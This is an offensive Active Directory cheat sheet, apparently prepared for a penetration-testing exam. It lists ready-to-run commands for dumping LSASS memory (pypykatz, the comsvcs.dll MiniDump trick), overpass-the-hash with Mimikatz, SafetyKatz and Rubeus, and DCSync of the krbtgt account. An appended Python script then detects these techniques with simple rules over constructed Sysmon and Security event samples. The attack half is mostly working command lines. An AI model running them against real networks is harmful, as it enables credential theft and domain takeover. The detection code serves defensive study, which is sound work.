Extracting Credentials from LSASS
pypykatz.exe live lsa

Find the LSASS process ID:
(Get-Process -ProcessName lsass).Id
tasklist /FI "IMAGENAME eq lsass.exe"

Dump LSASS memory with comsvcs.dll:
rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <lsass process ID> C:\Users\Public\lsass.dmp full

OverPass-The-Hash
OPTH generates tokens from hashes or keys.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:domain.name /aes256:<aes256key> /run:powershell.exe"'
SafetyKatz.exe "sekurlsa::pth /user:Administrator /domain:domain.name /aes256:<aes256key> /run:cmd.exe" "exit"

These commands start a PowerShell/cmd.exe session with logon type 9 (the same as runas /netonly).
Rubeus.exe asktgt /user:Administrator /rc4:<ntlmhash> /ptt
Rubeus.exe asktgt /user:Administrator /aes256:<aes256key> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

DCSync
To extract credentials from the DC without code execution on it, we can use DCSync.
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"

By default, Domain Admin privileges are required to run DCSync; verify this during the exam.
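The defender's side of the three techniques on this page (LSASS memory reads, the logon type 9 sessions that OPTH creates, and DCSync) as an added detection example; it is not part of the original cheat sheet. It runs simple rules over constructed sample events serialised as one "key=value" line each: Sysmon Event ID 10 (ProcessAccess) for LSASS reads, Security Event ID 4624 with LogonType 9 for the netonly session, and Security Event ID 4662 for replication rights being exercised. The two replication-right GUIDs are the real Active Directory extended rights DS-Replication-Get-Changes and DS-Replication-Get-Changes-All; the allowlists, the line format and every sample event (process names, account names, the non-replication GUID) are assumptions made for the example.

```python
import re

# Real AD extended-right GUIDs that a DCSync caller must hold on the domain object.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
PROCESS_VM_READ = 0x10  # access bit needed to read another process's memory

# Assumed allowlists for the example; tune them to the real environment.
LSASS_READERS_ALLOWED = {"csrss.exe", "wininit.exe", "msmpeng.exe"}
DOMAIN_CONTROLLER_ACCOUNTS = {"dc01$", "dc02$"}  # machine accounts that replicate legitimately

# Constructed sample events (not real logs); "key=value" pairs on one line each.
SAMPLE_EVENTS = [
    r"EventID=10 SourceImage=C:\Windows\System32\rundll32.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF",
    r"EventID=10 SourceImage=C:\Windows\System32\csrss.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1410",
    r"EventID=10 SourceImage=C:\Windows\System32\svchost.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1000",
    r"EventID=4624 LogonType=9 TargetUserName=Administrator",
    r"EventID=4662 SubjectUserName=DC01$ ObjectType=domainDNS Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    r"EventID=4662 SubjectUserName=jdoe ObjectType=domainDNS Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
    r"EventID=4662 SubjectUserName=jdoe ObjectType=user Properties={00000000-0000-0000-0000-000000000001}",  # constructed non-replication GUID
]

# A value runs until the next " key=" token or the end of the line, so GUID lists survive.
KV_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")
GUID_RE = re.compile(r"[0-9a-fA-F-]{36}")


def parse_event(line):
    """Turn one serialised event line into a dict of its fields."""
    return {key: value for key, value in KV_RE.findall(line)}


def check_lsass_access(ev):
    """Sysmon 10: a non-allowlisted process opened lsass.exe with PROCESS_VM_READ."""
    if ev.get("EventID") != "10":
        return None
    if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    access = int(ev.get("GrantedAccess", "0"), 16)
    source = ev.get("SourceImage", "").rsplit("\\", 1)[-1].lower()
    if access & PROCESS_VM_READ and source not in LSASS_READERS_ALLOWED:
        return f"HIGH lsass-memory-read source={source} access={access:#x}"
    return None


def check_dcsync(ev):
    """Security 4662: replication rights exercised by something other than a known DC."""
    if ev.get("EventID") != "4662":
        return None
    props = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
    if not props & REPLICATION_RIGHTS:
        return None
    who = ev.get("SubjectUserName", "").lower()
    if who in DOMAIN_CONTROLLER_ACCOUNTS:
        return None
    return f"HIGH replication-rights-used-by-non-dc user={who}"


def check_netonly_logon(ev):
    """Security 4624 with LogonType 9: the session type OPTH and runas /netonly create."""
    if ev.get("EventID") == "4624" and ev.get("LogonType") == "9":
        return f"INFO logon-type-9 user={ev.get('TargetUserName', '?').lower()}"
    return None


RULES = (check_lsass_access, check_dcsync, check_netonly_logon)


def run_detections(lines):
    """Apply every rule to every event line and return the alerts in order."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
```

On the samples above only three lines fire: the rundll32.exe read of LSASS, the logon type 9 session (informational, since runas /netonly produces the same event), and the jdoe account using replication rights; the DC01$ replication and the csrss.exe access are allowlisted, and the svchost.exe open lacks the PROCESS_VM_READ bit.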